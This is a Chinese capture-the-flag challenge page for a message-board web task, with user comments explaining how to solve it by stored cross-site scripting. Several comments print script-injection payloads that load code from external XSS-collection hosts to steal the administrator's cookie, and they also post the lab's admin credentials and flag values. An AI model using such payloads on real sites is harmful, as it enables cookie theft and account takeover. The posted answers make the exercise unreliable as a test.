留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 2734
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
晚风 1年前

flag{211d9b5b0ae2f9adfc8136e7a8d5aa3d}后面跟上/admin.php user: admin password: 011be4d65feac1a8登录,检查,找到相应的位置就能看见flag

回复 0

piying 1年前

思路:登录XSS平台https://xss.pt/,将如下代码植入<sCRiPt sRC=//i0.al/qUc5></sCrIpT>留言框,点击雁过留声,路过留言;在XSS平台查看得到flag,然后URL解码,得到flag{2276f57f5da12355e4525c634337aa06}

回复 1

107zsm 1年前

UrlEncode编码/解码

回复 0

几度夕阳红 1年前

我认为的正常思路:1、在留言板插入XSS代码 2、管理员观看留言,触发XSS代码 3、XSS平台接收到管理员cookie信息,这里的cookie就是flag。但是不知道靶场是否实现了管理员触发XSS的机制,XSS平台一直未接收到信息。大家伙的解法,使用工具扫描网站,发现admin.php,和你大概率扫不到的db.sql文件,db.sql有admin的账号密码。登录admin界面,会触发你写入的XS

回复 2
Robuntu 1年前

@harry 大佬,我用的xss平台一直没有收到信息,请问是payload的问题吗

回复 0

harry 管理员 1年前

已经实现了管理员触发XSS的机制

回复 2

星之队队大队长 1年前

先输入payload 然后 admin.php user: admin password: 011be4d65feac1a8 登录即可

回复 1

问题小子 1年前

纯小白,这道题怎么做啊

回复 2

xcxy 1年前

用御剑工具扫描不出文件目录,直接xss平台代码插入就行了,也不用变形,能够收到cookie : flag=flag%7B5b10e075f4319e7f628f6813ca4a1904%7D,这个是url编码,解码就行了。题目应该是改了,太简单了

回复 0

32130262 1年前

我用xss.pt生成的脚本,放入留言框里,换了很多格式。还使用F12 console 里输入javascript:eval('window.s=document.createElement("script");window.s.src="https://0x.ax/o0fK";document.body.appendChild(window.s)'),xss

回复 0

Wjustice 1年前

复盘一下,直接上工具得出后台路径,然后插入图片xss,导出flag,估计是改了题,以前应该是还有个dp.sql文件。。。。。

回复 4

Amibaba 1年前

/admin.php登录后台,账号admin 密码 011be4d65feac1a8,控制台打cookie,alert(document.cookie)

回复 0

WriteUp

image
丶我亚索贼六

5 金币

评分(17)

解题动态

Gyro 攻破了该题 4小时前
13667626741 攻破了该题 4小时前
YameMres 攻破了该题 1天前
geri 攻破了该题 2天前
Snngulaf 攻破了该题 2天前
KKsama 攻破了该题 3天前
linzixi 攻破了该题 3天前
zszfight 攻破了该题 4天前
toonavy 攻破了该题 5天前
燃燃然燃 攻破了该题 10天前
a1104048658 攻破了该题 10天前
unilot 攻破了该题 13天前
fxstu 攻破了该题 15天前
fuchen11 攻破了该题 15天前
她说我们只是朋友 攻破了该题 17天前
zachary 攻破了该题 17天前
13607979046 攻破了该题 17天前
buggy 攻破了该题 18天前
lmh123456 攻破了该题 19天前
szmlzw120 攻破了该题 20天前
问题反馈